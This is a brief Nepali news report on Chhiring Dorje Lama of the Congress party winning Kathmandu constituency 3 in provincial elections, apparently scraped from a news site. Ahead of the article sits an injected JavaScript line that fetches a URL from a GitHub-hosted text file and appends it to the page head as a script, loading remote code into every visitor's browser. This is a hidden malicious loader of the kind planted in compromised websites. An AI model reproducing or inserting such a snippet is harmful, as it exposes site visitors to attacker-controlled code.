;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यून, काठमाडौँ।
काठमाडौं क्षेत्र नं ३ प्रदेश क मा कांग्रेसका उम्मेदवार छिरिङ दोर्जे लामा विजयी भएका छन्।
सो क्षेत्रमा पर्ने प्रदेश क काठमाडौं महानगरपालिका वडा नं ६, र गोकर्णेश्वर नगरपालिका वडा नं ५ र ९ रहेको छ।
लामा २०७४ सालको चुनावमा पनि विजयी भएर एक कार्यकाल सांसद पद चलाई सकेका थिए। फेरि जनताले उनलाइनै रोजेर विजयी गराएका छन्।
मत परिमाण।
फेसबुक प्रतिक्रियाहरु